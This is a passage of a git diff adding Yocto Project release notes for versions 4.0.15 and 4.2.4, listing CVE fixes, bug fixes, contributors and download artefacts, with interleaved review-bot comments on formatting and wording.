+- Git Revision: :yocto_git:`d2f8b5cdb285b72a4ed93450f6703ca27aa42e8a </meta-gplv2/commit/?id=d2f8b5cdb285b72a4ed93450f6703ca27aa42e8a>`
+- Release Artefact: meta-gplv2-d2f8b5cdb285b72a4ed93450f6703ca27aa42e8a
+- sha: c386f59f8a672747dc3d0be1d4234b6039273d0e57933eb87caa20f56b9cca6d
+- Download Locations:
+ http://downloads.yoctoproject.org/releases/yocto/yocto-4.0.14/meta-gplv2-d2f8b5cdb285b72a4ed93450f6703ca27aa42e8a.tar.bz2
+ http://mirrors.kernel.org/yocto/yocto/yocto-4.0.14/meta-gplv2-d2f8b5cdb285b72a4ed93450f6703ca27aa42e8a.tar.bz2
+
+bitbake
+
+- Repository Location: :oe_git:`/bitbake`
+- Branch: :oe_git:`2.0 </bitbake/log/?h=2.0>`
+- Tag: :oe_git:`yocto-4.0.14 </bitbake/log/?h=yocto-4.0.14>`
+- Git Revision: :oe_git:`6c1ffa9091d0c53a100e8c8c15122d28642034bd </bitbake/commit/?id=6c1ffa9091d0c53a100e8c8c15122d28642034bd>`
+- Release Artefact: bitbake-6c1ffa9091d0c53a100e8c8c15122d28642034bd
+- sha: 1ceffc3b3359063341530c989a3606c897d862b61111538e683f101b02a360a2
+- Download Locations:
+ http://downloads.yoctoproject.org/releases/yocto/yocto-4.0.14/bitbake-6c1ffa9091d0c53a100e8c8c15122d28642034bd.tar.bz2
+ http://mirrors.kernel.org/yocto/yocto/yocto-4.0.14/bitbake-6c1ffa9091d0c53a100e8c8c15122d28642034bd.tar.bz2
+
+yocto-docs
+
+- Repository Location: :yocto_git:`/yocto-docs`
+- Branch: :yocto_git:`kirkstone </yocto-docs/log/?h=kirkstone>`
+- Tag: :yocto_git:`yocto-4.0.14 </yocto-docs/log/?h=yocto-4.0.14>`
+- Git Revision: :yocto_git:`260b446a1a75d99399a3421cd8d6ba276f508f37 </yocto-docs/commit/?id=260b446a1a75d99399a3421cd8d6ba276f508f37>`
+
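Review bot: In the "Repositories / Downloads for Yocto-4.0.14" section, every "Download Locations" entry is a plain http:// URL, and the digest line is labelled only "sha" without naming the algorithm. Since that digest is what a reader uses to verify the tarball, name the algorithm in the label (the 64 hex digits are consistent with SHA-256) and list https:// URLs if the download hosts serve them. Separately, "xserver-xorg: ignore :cve:`2022-3553`" uses a lowercase verb where the neighbouring entries use "Ignore" and "Fix"; capitalise it so the security list stays consistent and greppable.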
diff --git a/poky/documentation/migration-guides/release-notes-4.0.15.rst b/poky/documentation/migration-guides/release-notes-4.0.15.rst
new file mode 100644
index 0000000000..b2731530e8
--- /dev/null
+++ b/poky/documentation/migration-guides/release-notes-4.0.15.rst
@@ -0,0 +1,189 @@
+.. SPDX-License-Identifier: CC-BY-SA-2.0-UK
+
+Release notes for Yocto-4.0.15 (Kirkstone)
+------------------------------------------
+
+Security Fixes in Yocto-4.0.15
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+- avahi: Fix :cve:`2023-1981`, :cve:`2023-38469`, :cve:`2023-38470`, :cve:`2023-38471`, :cve:`2023-38472` and :cve:`2023-38473`
+- binutils: Fix :cve:`2022-47007`, :cve:`2022-47010` and :cve:`2022-48064`
+- bluez5: Fix :cve:`2023-45866`
+- ghostscript: Ignore GhostPCL :cve:`2023-38560`
+- gnutls: Fix :cve:`2023-5981`
+- go: Ignore :cve:`2023-45283` and :cve:`2023-45284`
+- grub: Fix :cve:`2023-4692` and :cve:`2023-4693`
+- gstreamer1.0-plugins-bad: Fix :cve_mitre:`2023-44429`
+- libsndfile: Fix :cve:`2022-33065`
+- libwebp: Fix :cve:`2023-4863`
+- openssl: Fix :cve:`2023-5678`
+- python3-cryptography: Fix :cve:`2023-49083`
+- qemu: Fix :cve:`2023-1544`
+- sudo: :cve:`2023-42456` and :cve_mitre:`2023-42465`
+- tiff: Fix :cve:`2023-41175`
+- vim: Fix :cve:`2023-46246`, :cve:`2023-48231`, :cve:`2023-48232`, :cve:`2023-48233`, :cve:`2023-48234`, :cve:`2023-48235`, :cve:`2023-48236`, :cve:`2023-48237` and :cve:`2023-48706`
+- xserver-xorg: Fix :cve:`2023-5367` and :cve:`2023-5380`
+- xwayland: Fix :cve:`2023-5367`
+
+
+Fixes in Yocto-4.0.15
+~~~~~~~~~~~~~~~~~~~~~
+
+- bash: changes to SIGINT handler while waiting for a child
+- bitbake: Fix disk space monitoring on cephfs
+- bitbake: bitbake-getvar: Make --quiet work with --recipe
+- bitbake: runqueue.py: fix PSI check logic
+- bitbake: runqueue: Add pressure change logging
+- bitbake: runqueue: convert deferral messages from bb.note to bb.debug
+- bitbake: runqueue: fix PSI check calculation
+- bitbake: runqueue: show more pressure data
+- bitbake: runqueue: show number of currently running bitbake threads when pressure changes
+- bitbake: tinfoil: Do not fail when logging is disabled and full config is used
+- build-appliance-image: Update to kirkstone head revision
+- cve-check: don't warn if a patch is remote
+- cve-check: slightly more verbose warning when adding the same package twice
+- cve-check: sort the package list in the JSON report
+- cve-exclusion_5.10.inc: update for 5.10.202
+- go: Fix issue in DNS resolver
+- goarch: Move Go architecture mapping to a library
+- gstreamer1.0-plugins-base: enable glx/opengl support
+- linux-yocto/5.10: update to v5.10.202
+- manuals: update class references
+- migration-guide: add release notes for 4.0.14
+- native: Clear TUNE_FEATURES/ABIEXTENSION
+- openssh: drop sudo from ptest dependencies
+- overview-manual: concepts: Add Bitbake Tasks Map
+- poky.conf: bump version for 4.0.15
+- python3-jinja2: Fixed ptest result output as per the standard
+- ref-manual: classes: explain cml1 class name
+- ref-manual: update :term:`SDK_NAME` variable documentation
+- ref-manual: variables: add :term:`RECIPE_MAINTAINER`
+- ref-manual: variables: document OEQA_REPRODUCIBLE_* variables
+- ref-manual: variables: mention new CDN for :term:`SSTATE_MIRRORS`
+- rust-common: Set llvm-target correctly for cross SDK targets
+- rust-cross-canadian: Fix ordering of target json config generation
+- rust-cross/rust-common: Merge arm target handling code to fix cross-canadian
+- rust-cross: Simplfy the rust_gen_target calls
+- rust-llvm: Allow overriding LLVM target archs
+- sdk-manual: extensible.rst: remove instructions for using SDK functionality directly in a yocto build
+- sudo: upgrade to 1.9.15p2
+- systemtap_git: fix used uninitialized error
+- vim: Improve locale handling
+- vim: Upgrade to 9.0.2130
+- vim: use upstream generated .po files
+
+
+Known Issues in Yocto-4.0.15
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+- N/A
+
+
+Contributors to Yocto-4.0.15
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+- Alexander Kanavin
+- Archana Polampalli
+- BELHADJ SALEM Talel
+- Bruce Ashfield
+- Chaitanya Vadrevu
+- Chen Qi
+- Deepthi Hemraj
+- Denys Dmytriyenko
+- Hitendra Prajapati
+- Lee Chee Yang
+- Li Wang
+- Martin Jansa
+- Meenali Gupta
+- Michael Opdenacker
+- Mikko Rapeli
+- Narpat Mali
+- Niko Mauno
+- Ninad Palsule
+- Niranjan Pradhan
+- Paul Eggleton
+- Peter Kjellerstedt
+- Peter Marko
+- Richard Purdie
+- Ross Burton
+- Samantha Jalabert
+- Sanjana
+- Soumya Sambu
+- Steve Sakoman
+- Tim Orling
+- Vijay Anusuri
+- Vivek Kumbhar
+- Wenlin Kang
+- Yogita Urade
+
+
+Repositories / Downloads for Yocto-4.0.15
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+poky
+
+- Repository Location: :yocto_git:`/poky`
+- Branch: :yocto_git:`kirkstone </poky/log/?h=kirkstone>`
+- Tag: :yocto_git:`yocto-4.0.15 </poky/log/?h=yocto-4.0.15>`
+- Git Revision: :yocto_git:`755632c2fcab43aa05cdcfa529727064b045073c </poky/commit/?id=755632c2fcab43aa05cdcfa529727064b045073c>`
+- Release Artefact: poky-755632c2fcab43aa05cdcfa529727064b045073c
+- sha: b40b43bd270d21a420c399981f9cfe0eb999f15e051fc2c89d124f249cdc0bd5
+- Download Locations:
+ http://downloads.yoctoproject.org/releases/yocto/yocto-4.0.15/poky-755632c2fcab43aa05cdcfa529727064b045073c.tar.bz2
+ http://mirrors.kernel.org/yocto/yocto/yocto-4.0.15/poky-755632c2fcab43aa05cdcfa529727064b045073c.tar.bz2
+
+openembedded-core
+
+- Repository Location: :oe_git:`/openembedded-core`
+- Branch: :oe_git:`kirkstone </openembedded-core/log/?h=kirkstone>`
+- Tag: :oe_git:`yocto-4.0.15 </openembedded-core/log/?h=yocto-4.0.15>`
+- Git Revision: :oe_git:`eea685e1caafd8e8121006d3f8b5d0b8a4f2a933 </openembedded-core/commit/?id=eea685e1caafd8e8121006d3f8b5d0b8a4f2a933>`
+- Release Artefact: oecore-eea685e1caafd8e8121006d3f8b5d0b8a4f2a933
+- sha: ddc3d4a2c8a097f2aa7132ae716affacc44b119c616a1eeffb7db56caa7fc79e
+- Download Locations:
+ http://downloads.yoctoproject.org/releases/yocto/yocto-4.0.15/oecore-eea685e1caafd8e8121006d3f8b5d0b8a4f2a933.tar.bz2
+ http://mirrors.kernel.org/yocto/yocto/yocto-4.0.15/oecore-eea685e1caafd8e8121006d3f8b5d0b8a4f2a933.tar.bz2
+
+meta-mingw
+
+- Repository Location: :yocto_git:`/meta-mingw`
+- Branch: :yocto_git:`kirkstone </meta-mingw/log/?h=kirkstone>`
+- Tag: :yocto_git:`yocto-4.0.15 </meta-mingw/log/?h=yocto-4.0.15>`
+- Git Revision: :yocto_git:`f6b38ce3c90e1600d41c2ebb41e152936a0357d7 </meta-mingw/commit/?id=f6b38ce3c90e1600d41c2ebb41e152936a0357d7>`
+- Release Artefact: meta-mingw-f6b38ce3c90e1600d41c2ebb41e152936a0357d7
+- sha: 7d57167c19077f4ab95623d55a24c2267a3a3fb5ed83688659b4c03586373b25
+- Download Locations:
+ http://downloads.yoctoproject.org/releases/yocto/yocto-4.0.15/meta-mingw-f6b38ce3c90e1600d41c2ebb41e152936a0357d7.tar.bz2
+ http://mirrors.kernel.org/yocto/yocto/yocto-4.0.15/meta-mingw-f6b38ce3c90e1600d41c2ebb41e152936a0357d7.tar.bz2
+
+meta-gplv2
+
+- Repository Location: :yocto_git:`/meta-gplv2`
+- Branch: :yocto_git:`kirkstone </meta-gplv2/log/?h=kirkstone>`
+- Tag: :yocto_git:`yocto-4.0.15 </meta-gplv2/log/?h=yocto-4.0.15>`
+- Git Revision: :yocto_git:`d2f8b5cdb285b72a4ed93450f6703ca27aa42e8a </meta-gplv2/commit/?id=d2f8b5cdb285b72a4ed93450f6703ca27aa42e8a>`
+- Release Artefact: meta-gplv2-d2f8b5cdb285b72a4ed93450f6703ca27aa42e8a
+- sha: c386f59f8a672747dc3d0be1d4234b6039273d0e57933eb87caa20f56b9cca6d
+- Download Locations:
+ http://downloads.yoctoproject.org/releases/yocto/yocto-4.0.15/meta-gplv2-d2f8b5cdb285b72a4ed93450f6703ca27aa42e8a.tar.bz2
+ http://mirrors.kernel.org/yocto/yocto/yocto-4.0.15/meta-gplv2-d2f8b5cdb285b72a4ed93450f6703ca27aa42e8a.tar.bz2
+
+bitbake
+
+- Repository Location: :oe_git:`/bitbake`
+- Branch: :oe_git:`2.0 </bitbake/log/?h=2.0>`
+- Tag: :oe_git:`yocto-4.0.15 </bitbake/log/?h=yocto-4.0.15>`
+- Git Revision: :oe_git:`42a1c9fe698a03feb34c5bba223c6e6e0350925b </bitbake/commit/?id=42a1c9fe698a03feb34c5bba223c6e6e0350925b>`
+- Release Artefact: bitbake-42a1c9fe698a03feb34c5bba223c6e6e0350925b
+- sha: 64c684ccd661fa13e25c859dfc68d66bec79281da0f4f81b0d6a9995acb659b5
+- Download Locations:
+ http://downloads.yoctoproject.org/releases/yocto/yocto-4.0.15/bitbake-42a1c9fe698a03feb34c5bba223c6e6e0350925b.tar.bz2
+ http://mirrors.kernel.org/yocto/yocto/yocto-4.0.15/bitbake-42a1c9fe698a03feb34c5bba223c6e6e0350925b.tar.bz2
+
+yocto-docs
+
+- Repository Location: :yocto_git:`/yocto-docs`
+- Branch: :yocto_git:`kirkstone </yocto-docs/log/?h=kirkstone>`
+- Tag: :yocto_git:`yocto-4.0.15 </yocto-docs/log/?h=yocto-4.0.15>`
+- Git Revision: :yocto_git:`08fda7a5601393617b1ecfe89229459e14a90b1d </yocto-docs/commit/?id=08fda7a5601393617b1ecfe89229459e14a90b1d>`
+
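Review bot: In "Security Fixes in Yocto-4.0.15", the entry "sudo: :cve:`2023-42456` and :cve_mitre:`2023-42465`" has no verb, so it does not say whether these CVEs were fixed or ignored. Every other entry in the list states "Fix" or "Ignore", and the two mean opposite things to someone auditing exposure, so add the verb explicitly. In the "Fixes" list, "rust-cross: Simplfy the rust_gen_target calls" carries a typo ("Simplify"); if the line mirrors the commit subject verbatim, leave it, otherwise correct it here.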
diff --git a/poky/documentation/migration-guides/release-notes-4.2.4.rst b/poky/documentation/migration-guides/release-notes-4.2.4.rst
new file mode 100644
index 0000000000..3c20140e29
--- /dev/null
+++ b/poky/documentation/migration-guides/release-notes-4.2.4.rst
@@ -0,0 +1,364 @@
+.. SPDX-License-Identifier: CC-BY-SA-2.0-UK
+
+Release notes for Yocto-4.2.4 (Mickledore)
+------------------------------------------
+
+Security Fixes in Yocto-4.2.4
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+- bind: Fix :cve:`2023-3341` and :cve:`2023-4236`
+- binutils: Fix :cve:`2023-39128`
+- cups: fix :cve:`2023-4504`
+- curl: Fix :cve:`2023-28320`, :cve:`2023-32001`, :cve:`2023-38039`, :cve:`2023-38545` and :cve:`2023-38546`
+- dmidecode: fix for :cve:`2023-30630`
+- dropbear: fix :cve:`2023-36328`
+- ffmpeg: Ignore :cve:`2023-39018`
+- gcc: Fix :cve:`2023-4039`
+- gdb: Fix :cve:`2023-39128`
+- ghostscript: Fix :cve:`2023-38559` and :cve:`2023-43115`
+- glibc: Fix :cve:`2023-4527` and :cve:`2023-4806`
+- go: Fix :cve:`2023-29409` and :cve:`2023-39533`
+- grub: Fix :cve:`2023-4692` and :cve:`2023-4693`
+- gstreamer: Fix :cve_mitre:`2023-40474`, :cve_mitre:`2023-40475` and :cve_mitre:`2023-40476`
+- inetutils: fix :cve:`2023-40303`
+- librsvg: Fix :cve:`2023-38633`
+- libssh2: Fix :cve:`2020-22218`
+- libwebp: Fix :cve:`2023-4863` and :cve:`2023-5129`
+- libx11: Fix :cve:`2023-43785`, :cve:`2023-43786` and :cve:`2023-43787`
+- libxpm: Fix :cve:`2023-43788` and :cve:`2023-43789`
+- linux-yocto/6.1: Ignore :cve:`2003-1604`, :cve:`2004-0230`, :cve:`2006-3635`, :cve:`2006-5331`, :cve:`2006-6128`, :cve:`2007-4774`, :cve:`2007-6761`, :cve:`2007-6762`, :cve:`2008-7316`, :cve:`2009-2692`, :cve:`2010-0008`, :cve:`2010-3432`, :cve:`2010-4648`, :cve:`2010-5313`, :cve:`2010-5328`, :cve:`2010-5329`, :cve:`2010-5331`, :cve:`2010-5332`, :cve:`2011-4098`, :cve:`2011-4131`, :cve:`2011-4915`, :cve:`2011-5321`, :cve:`2011-5327`, :cve:`2012-0957`, :cve:`2012-2119`, :cve:`2012-2136`, :cve:`2012-2137`, :cve:`2012-2313`, :cve:`2012-2319`, :cve:`2012-2372`, :cve:`2012-2375`, :cve:`2012-2390`, :cve:`2012-2669`, :cve:`2012-2744`, :cve:`2012-2745`, :cve:`2012-3364`, :cve:`2012-3375`, :cve:`2012-3400`, :cve:`2012-3412`, :cve:`2012-3430`, :cve:`2012-3510`, :cve:`2012-3511`, :cve:`2012-3520`, :cve:`2012-3552`, :cve:`2012-4398`, :cve:`2012-4444`, :cve:`2012-4461`, :cve:`2012-4467`, :cve:`2012-4508`, :cve:`2012-4530`, :cve:`2012-4565`, :cve:`2012-5374`, :cve:`2012-5375`, :cve:`2012-5517`, :cve:`2012-6536`, :cve:`2012-6537`, :cve:`2012-6538`, :cve:`2012-6539`, :cve:`2012-6540`, :cve:`2012-6541`, :cve:`2012-6542`, :cve:`2012-6543`, :cve:`2012-6544`, :cve:`2012-6545`, :cve:`2012-6546`, :cve:`2012-6547`, :cve:`2012-6548`, :cve:`2012-6549`, :cve:`2012-6638`, :cve:`2012-6647`, :cve:`2012-6657`, :cve:`2012-6689`, :cve:`2012-6701`, :cve:`2012-6703`, :cve:`2012-6704`, :cve:`2012-6712`, :cve:`2013-0160`, :cve:`2013-0190`, :cve:`2013-0216`, :cve:`2013-0217`, :cve:`2013-0228`, :cve:`2013-0231`, :cve:`2013-0268`, :cve:`2013-0290`, :cve:`2013-0309`, :cve:`2013-0310`, :cve:`2013-0311`, :cve:`2013-0313`, :cve:`2013-0343`, :cve:`2013-0349`, :cve:`2013-0871`, :cve:`2013-0913`, :cve:`2013-0914`, :cve:`2013-1059`, :cve:`2013-1763`, :cve:`2013-1767`, :cve:`2013-1772`, :cve:`2013-1773`, :cve:`2013-1774`, :cve:`2013-1792`, :cve:`2013-1796`, :cve:`2013-1797`, :cve:`2013-1798`, :cve:`2013-1819`, :cve:`2013-1826`, :cve:`2013-1827`, :cve:`2013-1828`, :cve:`2013-1848`, :cve:`2013-1858`, 
:cve:`2013-1860`, :cve:`2013-1928`, :cve:`2013-1929`, :cve:`2013-1943`, :cve:`2013-1956`, :cve:`2013-1957`, :cve:`2013-1958`, :cve:`2013-1959`, :cve:`2013-1979`, :cve:`2013-2015`, :cve:`2013-2017`, :cve:`2013-2058`, :cve:`2013-2094`, :cve:`2013-2128`, :cve:`2013-2140`, :cve:`2013-2141`, :cve:`2013-2146`, :cve:`2013-2147`, :cve:`2013-2148`, :cve:`2013-2164`, :cve:`2013-2206`, :cve:`2013-2232`, :cve:`2013-2234`, :cve:`2013-2237`, :cve:`2013-2546`, :cve:`2013-2547`, :cve:`2013-2548`, :cve:`2013-2596`, :cve:`2013-2634`, :cve:`2013-2635`, :cve:`2013-2636`, :cve:`2013-2850`, :cve:`2013-2851`, :cve:`2013-2852`, :cve:`2013-2888`, :cve:`2013-2889`, :cve:`2013-2890`, :cve:`2013-2891`, :cve:`2013-2892`, :cve:`2013-2893`, :cve:`2013-2894`, :cve:`2013-2895`, :cve:`2013-2896`, :cve:`2013-2897`, :cve:`2013-2898`, :cve:`2013-2899`, :cve:`2013-2929`, :cve:`2013-2930`, :cve:`2013-3076`, :cve:`2013-3222`, :cve:`2013-3223`, :cve:`2013-3224`, :cve:`2013-3225`, :cve:`2013-3226`, :cve:`2013-3227`, :cve:`2013-3228`, :cve:`2013-3229`, :cve:`2013-3230`, :cve:`2013-3231`, :cve:`2013-3232`, :cve:`2013-3233`, :cve:`2013-3234`, :cve:`2013-3235`, :cve:`2013-3236`, :cve:`2013-3237`, :cve:`2013-3301`, :cve:`2013-3302`, :cve:`2013-4125`, :cve:`2013-4127`, :cve:`2013-4129`, :cve:`2013-4162`, :cve:`2013-4163`, :cve:`2013-4205`, :cve:`2013-4220`, :cve:`2013-4247`, :cve:`2013-4254`, :cve:`2013-4270`, :cve:`2013-4299`, :cve:`2013-4300`, :cve:`2013-4312`, :cve:`2013-4343`, :cve:`2013-4345`, :cve:`2013-4348`, :cve:`2013-4350`, :cve:`2013-4387`, :cve:`2013-4470`, :cve:`2013-4483`, :cve:`2013-4511`, :cve:`2013-4512`, :cve:`2013-4513`, :cve:`2013-4514`, :cve:`2013-4515`, :cve:`2013-4516`, :cve:`2013-4563`, :cve:`2013-4579`, :cve:`2013-4587`, :cve:`2013-4588`, :cve:`2013-4591`, :cve:`2013-4592`, :cve:`2013-5634`, :cve:`2013-6282`, :cve:`2013-6367`, :cve:`2013-6368`, :cve:`2013-6376`, :cve:`2013-6378`, :cve:`2013-6380`, :cve:`2013-6381`, :cve:`2013-6382`, :cve:`2013-6383`, :cve:`2013-6431`, :cve:`2013-6432`, 
:cve:`2013-6885`, :cve:`2013-7026`, :cve:`2013-7027`, :cve:`2013-7263`, :cve:`2013-7264`, :cve:`2013-7265`, :cve:`2013-7266`, :cve:`2013-7267`, :cve:`2013-7268`, :cve:`2013-7269`, :cve:`2013-7270`, :cve:`2013-7271`, :cve:`2013-7281`, :cve:`2013-7339`, :cve:`2013-7348`, :cve:`2013-7421`, :cve:`2013-7446`, :cve:`2013-7470`, :cve:`2014-0038`, :cve:`2014-0049`, :cve:`2014-0055`, :cve:`2014-0069`, :cve:`2014-0077`, :cve:`2014-0100`, :cve:`2014-0101`, :cve:`2014-0102`, :cve:`2014-0131`, :cve:`2014-0155`, :cve:`2014-0181`, :cve:`2014-0196`, :cve:`2014-0203`, :cve:`2014-0205`, :cve:`2014-0206`, :cve:`2014-1438`, :cve:`2014-1444`, :cve:`2014-1445`, :cve:`2014-1446`, :cve:`2014-1690`, :cve:`2014-1737`, :cve:`2014-1738`, :cve:`2014-1739`, :cve:`2014-1874`, :cve:`2014-2038`, :cve:`2014-2039`, :cve:`2014-2309`, :cve:`2014-2523`, :cve:`2014-2568`, :cve:`2014-2580`, :cve:`2014-2672`, :cve:`2014-2673`, :cve:`2014-2678`, :cve:`2014-2706`, :cve:`2014-2739`, :cve:`2014-2851`, :cve:`2014-2889`, :cve:`2014-3122`, :cve:`2014-3144`, :cve:`2014-3145`, :cve:`2014-3153`, :cve:`2014-3180`, :cve:`2014-3181`, :cve:`2014-3182`, :cve:`2014-3183`, :cve:`2014-3184`, :cve:`2014-3185`, :cve:`2014-3186`, :cve:`2014-3534`, :cve:`2014-3535`, :cve:`2014-3601`, :cve:`2014-3610`, :cve:`2014-3611`, :cve:`2014-3631`, :cve:`2014-3645`, :cve:`2014-3646`, :cve:`2014-3647`, :cve:`2014-3673`, :cve:`2014-3687`, :cve:`2014-3688`, :cve:`2014-3690`, :cve:`2014-3917`, :cve:`2014-3940`, :cve:`2014-4014`, :cve:`2014-4027`, :cve:`2014-4157`, :cve:`2014-4171`, :cve:`2014-4508`, :cve:`2014-4608`, :cve:`2014-4611`, :cve:`2014-4652`, :cve:`2014-4653`, :cve:`2014-4654`, :cve:`2014-4655`, :cve:`2014-4656`, :cve:`2014-4667`, :cve:`2014-4699`, :cve:`2014-4943`, :cve:`2014-5045`, :cve:`2014-5077`, :cve:`2014-5206`, :cve:`2014-5207`, :cve:`2014-5471`, :cve:`2014-5472`, :cve:`2014-6410`, :cve:`2014-6416`, :cve:`2014-6417`, :cve:`2014-6418`, :cve:`2014-7145`, :cve:`2014-7283`, :cve:`2014-7284`, :cve:`2014-7822`, :cve:`2014-7825`, 
:cve:`2014-7826`, :cve:`2014-7841`, :cve:`2014-7842`, :cve:`2014-7843`, :cve:`2014-7970`, :cve:`2014-7975`, :cve:`2014-8086`, :cve:`2014-8133`, :cve:`2014-8134`, :cve:`2014-8159`, :cve:`2014-8160`, :cve:`2014-8171`, :cve:`2014-8172`, :cve:`2014-8173`, :cve:`2014-8369`, :cve:`2014-8480`, :cve:`2014-8481`, :cve:`2014-8559`, :cve:`2014-8709`, :cve:`2014-8884`, :cve:`2014-8989`, :cve:`2014-9090`, :cve:`2014-9322`, :cve:`2014-9419`, :cve:`2014-9420`, :cve:`2014-9428`, :cve:`2014-9529`, :cve:`2014-9584`, :cve:`2014-9585`, :cve:`2014-9644`, :cve:`2014-9683`, :cve:`2014-9710`, :cve:`2014-9715`, :cve:`2014-9717`, :cve:`2014-9728`, :cve:`2014-9729`, :cve:`2014-9730`, :cve:`2014-9731`, :cve:`2014-9803`, :cve:`2014-9870`, :cve:`2014-9888`, :cve:`2014-9895`, :cve:`2014-9903`, :cve:`2014-9904`, :cve:`2014-9914`, :cve:`2014-9922`, :cve:`2014-9940`, :cve:`2015-0239`, :cve:`2015-0274`, :cve:`2015-0275`, :cve:`2015-1333`, :cve:`2015-1339`, :cve:`2015-1350`, :cve:`2015-1420`, :cve:`2015-1421`, :cve:`2015-1465`, :cve:`2015-1573`, :cve:`2015-1593`, :cve:`2015-1805`, :cve:`2015-2041`, :cve:`2015-2042`, :cve:`2015-2150`, :cve:`2015-2666`, :cve:`2015-2672`, :cve:`2015-2686`, :cve:`2015-2830`, :cve:`2015-2922`, :cve:`2015-2925`, :cve:`2015-3212`, :cve:`2015-3214`, :cve:`2015-3288`, :cve:`2015-3290`, :cve:`2015-3291`, :cve:`2015-3331`, :cve:`2015-3339`, :cve:`2015-3636`, :cve:`2015-4001`, :cve:`2015-4002`, :cve:`2015-4003`, :cve:`2015-4004`, :cve:`2015-4036`, :cve:`2015-4167`, :cve:`2015-4170`, :cve:`2015-4176`, :cve:`2015-4177`, :cve:`2015-4178`, :cve:`2015-4692`, :cve:`2015-4700`, :cve:`2015-5156`, :cve:`2015-5157`, :cve:`2015-5257`, :cve:`2015-5283`, :cve:`2015-5307`, :cve:`2015-5327`, :cve:`2015-5364`, :cve:`2015-5366`, :cve:`2015-5697`, :cve:`2015-5706`, :cve:`2015-5707`, :cve:`2015-6252`, :cve:`2015-6526`, :cve:`2015-6937`, :cve:`2015-7509`, :cve:`2015-7513`, :cve:`2015-7515`, :cve:`2015-7550`, :cve:`2015-7566`, :cve:`2015-7613`, :cve:`2015-7799`, :cve:`2015-7833`, :cve:`2015-7872`, 
:cve:`2015-7884`, :cve:`2015-7885`, :cve:`2015-7990`, :cve:`2015-8104`, :cve:`2015-8215`, :cve:`2015-8324`, :cve:`2015-8374`, :cve:`2015-8539`, :cve:`2015-8543`, :cve:`2015-8550`, :cve:`2015-8551`, :cve:`2015-8552`, :cve:`2015-8553`, :cve:`2015-8569`, :cve:`2015-8575`, :cve:`2015-8660`, :cve:`2015-8709`, :cve:`2015-8746`, :cve:`2015-8767`, :cve:`2015-8785`, :cve:`2015-8787`, :cve:`2015-8812`, :cve:`2015-8816`, :cve:`2015-8830`, :cve:`2015-8839`, :cve:`2015-8844`, :cve:`2015-8845`, :cve:`2015-8950`, :cve:`2015-8952`, :cve:`2015-8953`, :cve:`2015-8955`, :cve:`2015-8956`, :cve:`2015-8961`, :cve:`2015-8962`, :cve:`2015-8963`, :cve:`2015-8964`, :cve:`2015-8966`, :cve:`2015-8967`, :cve:`2015-8970`, :cve:`2015-9004`, :cve:`2015-9016`, :cve:`2015-9289`, :cve:`2016-0617`, :cve:`2016-0723`, :cve:`2016-0728`, :cve:`2016-0758`, :cve:`2016-0821`, :cve:`2016-0823`, :cve:`2016-10044`, :cve:`2016-10088`, :cve:`2016-10147`, :cve:`2016-10150`, :cve:`2016-10153`, :cve:`2016-10154`, :cve:`2016-10200`, :cve:`2016-10208`, :cve:`2016-10229`, :cve:`2016-10318`, :cve:`2016-10723`, :cve:`2016-10741`, :cve:`2016-10764`, :cve:`2016-10905`, :cve:`2016-10906`, :cve:`2016-10907`, :cve:`2016-1237`, :cve:`2016-1575`, :cve:`2016-1576`, :cve:`2016-1583`, :cve:`2016-2053`, :cve:`2016-2069`, :cve:`2016-2070`, :cve:`2016-2085`, :cve:`2016-2117`, :cve:`2016-2143`, :cve:`2016-2184`, :cve:`2016-2185`, :cve:`2016-2186`, :cve:`2016-2187`, :cve:`2016-2188`, :cve:`2016-2383`, :cve:`2016-2384`, :cve:`2016-2543`, :cve:`2016-2544`, :cve:`2016-2545`, :cve:`2016-2546`, :cve:`2016-2547`, :cve:`2016-2548`, :cve:`2016-2549`, :cve:`2016-2550`, :cve:`2016-2782`, :cve:`2016-2847`, :cve:`2016-3044`, :cve:`2016-3070`, :cve:`2016-3134`, :cve:`2016-3135`, :cve:`2016-3136`, :cve:`2016-3137`, :cve:`2016-3138`, :cve:`2016-3139`, :cve:`2016-3140`, :cve:`2016-3156`, :cve:`2016-3157`, :cve:`2016-3672`, :cve:`2016-3689`, :cve:`2016-3713`, :cve:`2016-3841`, :cve:`2016-3857`, :cve:`2016-3951`, :cve:`2016-3955`, :cve:`2016-3961`, 
:cve:`2016-4440`, :cve:`2016-4470`, :cve:`2016-4482`, :cve:`2016-4485`, :cve:`2016-4486`, :cve:`2016-4557`, :cve:`2016-4558`, :cve:`2016-4565`, :cve:`2016-4568`, :cve:`2016-4569`, :cve:`2016-4578`, :cve:`2016-4580`, :cve:`2016-4581`, :cve:`2016-4794`, :cve:`2016-4805`, :cve:`2016-4913`, :cve:`2016-4951`, :cve:`2016-4997`, :cve:`2016-4998`, :cve:`2016-5195`, :cve:`2016-5243`, :cve:`2016-5244`, :cve:`2016-5400`, :cve:`2016-5412`, :cve:`2016-5696`, :cve:`2016-5728`, :cve:`2016-5828`, :cve:`2016-5829`, :cve:`2016-6130`, :cve:`2016-6136`, :cve:`2016-6156`, :cve:`2016-6162`, :cve:`2016-6187`, :cve:`2016-6197`, :cve:`2016-6198`, :cve:`2016-6213`, :cve:`2016-6327`, :cve:`2016-6480`, :cve:`2016-6516`, :cve:`2016-6786`, :cve:`2016-6787`, :cve:`2016-6828`, :cve:`2016-7039`, :cve:`2016-7042`, :cve:`2016-7097`, :cve:`2016-7117`, :cve:`2016-7425`, :cve:`2016-7910`, :cve:`2016-7911`, :cve:`2016-7912`, :cve:`2016-7913`, :cve:`2016-7914`, :cve:`2016-7915`, :cve:`2016-7916`, :cve:`2016-7917`, :cve:`2016-8399`, :cve:`2016-8405`, :cve:`2016-8630`, :cve:`2016-8632`, :cve:`2016-8633`, :cve:`2016-8636`, :cve:`2016-8645`, :cve:`2016-8646`, :cve:`2016-8650`, :cve:`2016-8655`, :cve:`2016-8658`, :cve:`2016-8666`, :cve:`2016-9083`, :cve:`2016-9084`, :cve:`2016-9120`, :cve:`2016-9178`, :cve:`2016-9191`, :cve:`2016-9313`, :cve:`2016-9555`, :cve:`2016-9576`, :cve:`2016-9588`, :cve:`2016-9604`, :cve:`2016-9685`, :cve:`2016-9754`, :cve:`2016-9755`, :cve:`2016-9756`, :cve:`2016-9777`, :cve:`2016-9793`, :cve:`2016-9794`, :cve:`2016-9806`, 